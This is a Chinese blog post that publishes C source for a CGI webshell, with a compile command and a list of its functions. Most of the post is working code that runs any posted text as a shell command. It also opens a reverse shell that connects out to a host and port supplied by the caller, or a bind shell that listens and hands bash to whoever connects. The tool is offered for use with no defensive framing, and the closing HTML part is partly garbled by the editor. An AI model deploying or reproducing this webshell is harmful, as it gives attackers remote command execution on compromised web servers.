Chinaunix首页 | 论坛 | 博客
  • 博客访问: 147294
  • 博文数量: 13
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 1192
  • 用 户 组: 普通用户
  • 注册时间: 2013-10-11 15:41
个人简介

Cyber Security

文章分类

全部博文(13)

文章存档

2015年(1)

2014年(6)

2013年(6)

分类: C/C++

2015-02-03 11:51:52

C实现的cgi webshell


点击(此处)折叠或打开

  1. #include <stdio.h>
  2. #include <stdio.h>
  3. #include <string.h>
  4. #include <unistd.h>
  5. #include <stdlib.h>
  6. #include <sys/types.h>
  7. #include <sys/socket.h>
  8. #include <netinet/in.h>
  9. #include <arpa/inet.h>
  10. #include <netdb.h>
  11. #include <signal.h>
  12.  

  13.  
  14. struct get_data {
  15.     char key[100];
  16.     char value[100];
  17. };
  18.  
  19.  
  20. void exec_cmd(void){
  21.     printf("Content-type:text/html\n\n");
  22.     FILE *command;
  23.     int size = atoi(getenv("CONTENT_LENGTH"));
  24.     if(size > 1500) {
  25.         printf("Error> Post Data is very big");
  26.         exit(0);
  27.     }
  28.     char *buffer = malloc(size+1);
  29.     fread(buffer,1,size,stdin);
  30.     command = popen(buffer,"r");
  31.     char caracter;
  32.  
  33.     while((caracter = fgetc(command))){
  34.         if(caracter == EOF) break;
  35.         printf("%c",caracter);
  36.     }
  37.  
  38.     pclose(command);
  39.     free(buffer);
  40.     exit(0);
  41. }
  42.  
  43. int error(char *err){
  44.     perror(err);
  45.     exit(EXIT_FAILURE);
  46. }
  47.  
  48. void parser_get(void){
  49.     printf("Content-type:text/html\n\n");
  50.  
  51.     struct get_data *s;
  52.     char *GET = (char *)getenv("QUERY_STRING");
  53.     int i,number_of_get = 0,size_get = strlen(GET);
  54.  
  55.     if(strlen(GET) > 100)
  56.         exit(0);
  57.  
  58.     s = (struct get_data *)malloc(number_of_get*sizeof(struct get_data));
  59.  
  60.     int element = 0;
  61.     int positionA = 0;
  62.     int positionB = 0;
  63.     int id = 0;
  64.  
  65.     for(i=0;i<size_get;i++){
  66.         if(GET[i] == '='){
  67.             id = 1;
  68.             s[element].key[positionA] = '\0';
  69.             positionB = 0;
  70.             continue;
  71.         }
  72.  
  73.         if(GET[i] == '&'){
  74.             id = 0;
  75.             s[element].key[positionA] = '\0';
  76.             s[element].value[positionB] = '\0';
  77.             positionA = 0;
  78.             positionB = 0;
  79.             element++;
  80.             continue;
  81.         }
  82.  
  83.         if(id==0){
  84.             s[element].key[positionA] = GET[i];
  85.             positionA++;
  86.         }
  87.  
  88.         if(id==1){
  89.             s[element].value[positionB] = GET[i];
  90.             positionB++;
  91.         }
  92.  
  93.         if(i == size_get-1 && GET[size_get-1] != '&'){
  94.             s[element].key[positionA] = '\0';
  95.             s[element].value[positionB] = '\0';
  96.             element++;
  97.             continue;
  98.         }
  99.  
  100.  
  101.     }
  102.  
  103.     char *host_x = (char *)malloc(100);
  104.     host_x = NULL;
  105.     char *type_x = (char *)malloc(100);
  106.     type_x = NULL;
  107.     int port_x = 0;
  108.  
  109.     for(i=0;i<element;i++){
  110.         if(strcmp(s[i].key,"type")==0)
  111.             type_x = s[i].value;
  112.         else if(strcmp(s[i].key,"host")==0)
  113.             host_x = s[i].value;
  114.         else if(strcmp(s[i].key,"port")==0)
  115.             port_x = atoi(s[i].value);
  116.     }
  117.  
  118.     free(s);
  119.  
  120.     if(type_x == NULL){
  121.         free(type_x);
  122.         free(host_x);
  123.         exit(0);
  124.     }
  125.  
  126.     if( (strcmp(type_x,"")==0) || port_x <= 0 || port_x > 65535){
  127.         printf("Something is wrong ... !!!");
  128.         free(type_x);
  129.         free(host_x);
  130.         exit(0);
  131.     }
  132.  
  133.     if((strcmp(type_x,"reverse")==0) && (strcmp(host_x,"")==0)){
  134.         printf("You must specify a target host ...");
  135.         free(type_x);
  136.         free(host_x);
  137.         exit(0);
  138.     }
  139.  
  140.     if(strcmp(type_x,"reverse") == 0){
  141.         struct sockaddr_in addr;
  142.         int msocket;
  143.         msocket = socket(AF_INET,SOCK_STREAM,0);
  144.  
  145.         if(msocket < 0){
  146.             printf("Fail to create socket");
  147.             free(host_x);
  148.             free(type_x);
  149.             exit(0);
  150.         }
  151.  
  152.         addr.sin_family = AF_INET;
  153.         addr.sin_port = htons(port_x);
  154.         addr.sin_addr.s_addr = inet_addr(host_x);
  155.  
  156.         memset(&addr.sin_zero,0,sizeof(addr.sin_zero));
  157.  
  158.         if(connect(msocket,(struct sockaddr*)&addr,sizeof(addr)) == -1){
  159.             printf("Fail to connect\n");
  160.             free(host_x);
  161.             free(type_x);
  162.             exit(0);
  163.         }
  164.  
  165.         printf("Connect with sucess !!!\n");
  166.  
  167.         if(fork() == 0){
  168.             close(0); close(1); close(2);
  169.             dup2(msocket, 0); dup2(msocket, 1); dup2(msocket,2);
  170.             execl("/bin/bash","bash","-i", (char *)0);
  171.             close(msocket);
  172.             exit(0);
  173.         }
  174.  
  175.         free(host_x);
  176.         free(type_x);
  177.         exit(0);
  178.     } else if (strcmp(type_x,"bind")==0) {
  179.  
  180.         int my_socket, cli_socket;
  181.         struct sockaddr_in server_addr,cli_addr;
  182.  
  183.         if ((my_socket = socket(AF_INET, SOCK_STREAM, 0)) == -1){
  184.             printf("Fail to create socket");
  185.             exit(1);
  186.         }
  187.  
  188.         server_addr.sin_family = AF_INET;
  189.         server_addr.sin_port = htons(port_x);
  190.         server_addr.sin_addr.s_addr = INADDR_ANY;
  191.         bzero(&(server_addr.sin_zero), 8);
  192.  
  193.         int optval = 1;
  194.         setsockopt(my_socket, SOL_SOCKET, SO_REUSEADDR, &optval, sizeof optval);
  195.  
  196.  
  197.         if (bind(my_socket, (struct sockaddr *)&server_addr, sizeof(struct sockaddr))== -1){
  198.             printf("Fail to bind");
  199.             free(host_x);
  200.             free(type_x);
  201.             exit(1);
  202.         }
  203.  
  204.         if (listen(my_socket, 1) < 0){
  205.             printf("Fail to listen");
  206.             free(host_x);
  207.             free(type_x);
  208.             exit(1);
  209.         } else {
  210.             printf("Listen on port %d\n",port_x);
  211.         }
  212.  
  213.         if(fork() == 0){
  214.             socklen_t tamanho = sizeof(struct sockaddr_in);
  215.  
  216.             if ((cli_socket = accept(my_socket, (struct sockaddr *)&cli_addr,&tamanho)) < 0){
  217.                 exit(0);
  218.  
  219.             }
  220.  
  221.             close(0); close(1); close(2);
  222.             dup2(cli_socket, 0); dup2(cli_socket, 1); dup2(cli_socket,2);
  223.  
  224.             execl("/bin/bash","bash","-i",(char *)0);
  225.             close(cli_socket);
  226.  
  227.         }
  228.  
  229.     }
  230.     free(host_x);
  231.     free(type_x);
  232.     exit(0);
  233. }
  234.  
  235. void load_css_js(void){
  236. printf("\n\
  237. \n\
  238. ");
  239.  
  240. }
  241.  
  242. int main(void){
  243.     if(strcmp(getenv("REQUEST_METHOD"),"POST") == 0) exec_cmd();
  244.     if(strcmp(getenv("QUERY_STRING"),"") != 0) parser_get();
  245.     printf("Content-type:text/html\n\n");
  246.  
  247.     printf("\n");
  248.     printf("\t\n\tContent-type\" content=\"text/html;charset=UTF-8\">\n");
  249.     printf("\t\t C CGI SHELL =D \n");
  250.     load_css_js();
  251.     printf("\n\t\n");
  252.     printf("\t\n");
  253. printf(" \n\
  254.     
    page-wrap\">\n\
  255.     

    C - CGI SHELL

    C0d3r: webshell | REVERSE/BIND
    \n\
  256.     
    \n\
  257.     text\" style=\"width:300px;\" id=\"xxx\" onkeyup=\"if(event.keyCode == 13) document.getElementById('lol').click()\">\n\
  258.     " type=\"button\" value=\"Run Command\" onclick=\"exec_cmd()\">br/>\n\
  259.     
    " id='result'>
以上为部分代码(CU的富文本编辑器有些问题)


编译:
gcc shell.c -o shell.cgi

功能:
1.反弹获得shell(target作为客户端)


2.监听获得shell(target作为服务端)


3.命令行执行

阅读(2951) | 评论(0) | 转发(0) |
0

上一篇:PAM模块的backdoor实现与分析

下一篇:没有了

给主人留下些什么吧!~~